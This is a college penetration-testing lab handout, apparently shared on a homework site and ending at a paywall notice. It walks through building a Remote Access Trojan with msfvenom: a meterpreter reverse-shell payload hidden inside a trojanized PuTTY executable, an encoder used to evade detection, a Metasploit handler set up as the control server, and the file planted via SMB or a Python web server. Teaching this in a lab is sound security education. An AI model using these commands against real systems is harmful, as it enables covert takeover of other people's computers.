[Lab-Pentest] Metasploit RAT



Madison Area Technical College, Madison *

*We aren’t endorsed by this school




Computer Science


Dec 6, 2023





Uploaded by LavonCN on coursehero.com

[Lab-Pentest] Metasploit RAT Introduction A Remote Access Trojan (RAT) is an application that hackers use to covertly control a targeted machine. In this lab we use msfvenom to create a RAT. We will use msfconsole to create a handler to receive incoming connections from our RAT and interact with the targeted machine. For this lab Windows 2008RC2 and Windows 10 are the target systems. The Kali Linux machine is the attacker. There are three stages to this type of attack. The first is to create a malicious executable, Next we deploy the RAT to the target machine. Finally, we wait for the target to connect back to the attacking system. Background The following sections provide information about your payloads. 32-bit or 64-bit: The sample executable could be compiled as either a 32-bit or 64-bit application. If we try to build our trojan using the wrong format our back door will not work. The Windows PE (Portable Executable) format has many different machine types but we are only concerned with two. Content Value Description IMAGE_FILE_MACHINE_AMD64 0x8664 [6486] x64 IMAGE_FILE_MACHINE_I386 0x14c [ 4c01] Intel 386 or later processors and compatible processors We need to check if the executable we downloaded is 64 or 32 bits. A quick and easy way to do this is using hexdump (this comes already installed on Kali Linux). hexdump -C -n 200 <base file>.exe What we are looking for is the line that contains “PE” (Note: This line can be in different places so run hexdump and look for it).
32-bit Executable: A 32-bit executable will have the pattern [50 45 00 00 4c 01] on the same line that has the letters PE. 64-bit Executable: A 64-bit executable will have the pattern [50 45 00 00 64 86] on the same line that has the letters PE. Lab Activities The following sections walk you through the process of building a RAT, deploying it to your target and executing it to deliver your payload. Build the trojan into the base executable: Depending on the architecture of our target, we need to select a payload that matches. Note: You will run into problems if you try to put a 64-bit payload into a 32-bit executable or try to execute a 32-bit payload on a 64-bit architecture. MSFVenom Metasploits standalone payload generator. We use this when we want to make file based metasploit payloads. Payloads can also be created in the msfconsole but a few key features are missing in that interface to make it ideal for file based executables (No --keep option). Just to keep things organized it is usually a good idea to make a special directory to build you trojan executables in (don't want to lose track of these ;) ) To review all of the available payload options, execute msfvenom with the --payload- options argument. msfvenom --payload-options -p windows/x64/meterpreter/reverse_tcp For this lab, the following options will be used to generate the malicious version of Putty.
-a [--arch] = The architecture to use --platform = The platform of the payload -p [--payload] = Payload to use. -e [--encoder] = The encoder to use -i [--iterations] = The number of times to encode the payload -f [--format] = Output format (use --help-formats for a list) -x [--template] = Specify a custom executable file to use as a template -o [--out] = Save the payload to <filename> -k [--keep] = Preserve the template behavior For a Windows x64 [64-bit] Note: You must use a 64-bit application template! msfvenom -a x64 --platform windows -x putty-64.exe -k -p windows/x64/meterpreter/reverse_tcp lhost= lport=31337 -f exe -o putty-backdoor.exe For Windows x86 [32-bit] Note: You must use a 32-bit application template! msfvenom -a x86 --platform windows -x putty-32.exe -k -p windows/meterpreter/reverse_tcp lhost= lport=31337 -e x86/shikata_ga_nai -i 3 -f exe -o putty-backdoor.exe Command and Control Server [C2] We need a way to control the target system once we have our RAT running on it. Metasploit Framework provides the exploit/multi/handler module for this purpose. Metasploit Handler The metasploit multi-handler is a generic server that we assign different behavior based on the PAYLOAD we define. In this case we are telling it to create a server and configure it to listen on port 5000 for a “meterpreter/reverse_tcp” connection. msf> use exploit/multi/handler msf exploit(multi/handler) set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(multi/handler) set LHOST msf exploit(multi/handler) set LPORT 31337
msf exploit(multi/handler) run We are now ready to receive connections from our RAT. Next, we need to deploy the RAT to the target system. Deploy the RAT The following sections discuss two techniques to move your RAT onto the target system. Using SMBClient The smbclient utility can be used to move files onto a Windows system that exposes the SMB service. Not that this technique will not work for systems that are filtering inbound SMB connections using a host-based firewall. To begin, change to the directory on your Kali system that contains your malicious executables. [kali] cd ~/assessments/malware/ Next, connect to the target system using the smbclient command in Kali. [kali] smbclient \\\\\\c$ -U Administrator Enter Workgroup\Administrator’s password: smb: \> Finally, upload your malicious executable to the target system. smb: \> put putty-backdoor.exe smb: \> exit In general, this interaction is similar to a typical FTP transfer with the main difference being the use of SMB instead of FTP. At this point, you have uploaded your malicious executable to the root of the filesystem on the Windows 2008RC2 target. Using Python3’s HTTP Server At this point we have produced an executable file that we will need to get onto the target machine and execute. To accomplish this we will use the HTTP server available as a Python3 module. Ensure you are in the directory that contains the executables you generated using msfvenom and execute the python module. [kali] cd /root/backdoors [kali] python -m http.server
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help